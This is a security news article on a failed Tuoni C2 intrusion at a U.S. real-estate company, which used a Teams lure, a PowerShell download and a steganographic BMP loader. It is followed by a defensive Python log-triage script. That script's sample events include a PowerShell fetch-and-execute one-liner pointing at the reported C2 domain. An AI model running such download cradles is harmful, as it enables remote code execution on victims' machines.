Cyber Web Spider Blog – News

Researchers Detail Tuoni C2’s Role in an Attempted 2025 Real-Estate Cyber Intrusion

Posted on November 18, 2025 By CWS

Nov 18, 2025 | Ravie Lakshmanan | Malware / Social Engineering
Cybersecurity researchers have disclosed details of a cyber attack targeting a major U.S.-based real-estate company that involved the use of a nascent command-and-control (C2) and red teaming framework known as Tuoni.
"The campaign leveraged the emerging Tuoni C2 framework, a relatively new command-and-control (C2) tool (with a free license) that delivers stealthy, in-memory payloads," Morphisec researcher Shmuel Uzan said in a report shared with The Hacker News.
Tuoni is advertised as an advanced C2 framework designed for security professionals, facilitating penetration testing operations, red team engagements, and security assessments. A "Community Edition" of the software is freely available for download from GitHub. It was first released in early 2024.

The attack, per Morphisec, unfolded in mid-October 2025, with the unknown threat actor likely gaining initial access through social engineering via Microsoft Teams impersonation. The attackers are suspected of posing as trusted vendors or colleagues to deceive an employee at the company into running a PowerShell command.
That command downloads a second PowerShell script from an external server ("kupaoquan[.]com"), which in turn uses steganography to conceal the next-stage payload inside a bitmap image (BMP). The primary purpose of the embedded payload is to extract shellcode and execute it directly in memory.
This results in the execution of "TuoniAgent.dll," the agent component that runs on the targeted machine and connects to a C2 server (in this case, "kupaoquan[.]com"), allowing remote control.
"While Tuoni itself is a sophisticated but conventional C2 framework, the delivery mechanism showed signs of AI assistance in code generation, evident from the scripted comments and modular structure of the initial loader," Morphisec added.
The attack, although ultimately unsuccessful, demonstrates the continued abuse of red teaming tools for malicious purposes. In September 2025, Check Point detailed the use of an artificial intelligence (AI)-powered tool called HexStrike AI to rapidly accelerate and simplify vulnerability exploitation.
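As an added, defender-side illustration (not code from the Morphisec report or from the Tuoni project): a small Python triage routine that scans PowerShell script-block log text for the chain described above (a remote script fetch, a bitmap download, and in-memory execution) and for the reported C2 domain. The stage names, thresholds and sample events are constructed assumptions; only the domain comes from the report.

```python
import re

# Defanged C2 domain as given in the Morphisec report; refanged before matching raw logs.
REPORTED_C2_DOMAINS = {"kupaoquan[.]com"}

def refang(value: str) -> str:
    """Turn defanged indicators ('kupaoquan[.]com', 'hxxp://') back into matchable form."""
    return value.replace("[.]", ".").replace("hxxp", "http")

# One regex per link in the chain the article describes. Stage names are our own labels.
STAGE_PATTERNS = {
    "remote_script_fetch": re.compile(r"DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "image_payload": re.compile(r"https?://[^\s'\"]+\.bmp\b", re.I),
    "in_memory_exec": re.compile(r"Invoke-Expression|\bIEX\b|Reflection\.Assembly\]::Load|VirtualAlloc", re.I),
}

def analyse_script_block(text: str) -> dict:
    """Return the chain stages seen in one script block plus any reported C2 domain it references."""
    raw = refang(text)
    stages = [name for name, rx in STAGE_PATTERNS.items() if rx.search(raw)]
    domains = [d for d in REPORTED_C2_DOMAINS if refang(d).lower() in raw.lower()]
    return {"stages": stages, "c2_domains": domains}

def verdict(text: str) -> str:
    """Map findings to a triage label; the thresholds are assumptions to tune against your baseline."""
    found = analyse_script_block(text)
    if found["c2_domains"]:
        return "known_c2_contact"
    if {"image_payload", "in_memory_exec"} <= set(found["stages"]):
        return "stego_loader_chain"
    if len(found["stages"]) >= 2:
        return "suspicious_download_cradle"
    return "no_match"

# Constructed sample script-block events (not real telemetry); bodies mimic Event ID 4104 text.
SAMPLE_EVENTS = [
    ("evt-1", "Get-ChildItem C:\\Reports | Measure-Object"),
    ("evt-2", "$w=New-Object Net.WebClient; $img=$w.DownloadData('https://cdn.example.invalid/banner.bmp'); "
              "$sc=...; [System.Reflection.Assembly]::Load($sc)"),
    ("evt-3", "IEX ((New-Object Net.WebClient).DownloadString('hxxp://kupaoquan[.]com/update.ps1'))"),
    ("evt-4", "Invoke-WebRequest https://intranet.example.invalid/tool.zip -OutFile tool.zip"),
]

def triage(events=SAMPLE_EVENTS) -> dict:
    """Label each (event_id, script_text) pair; a plain download alone (evt-4) is not flagged."""
    return {eid: verdict(body) for eid, body in events}

if __name__ == "__main__":
    for eid, label in triage().items():
        print(f"{eid}: {label}")
```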
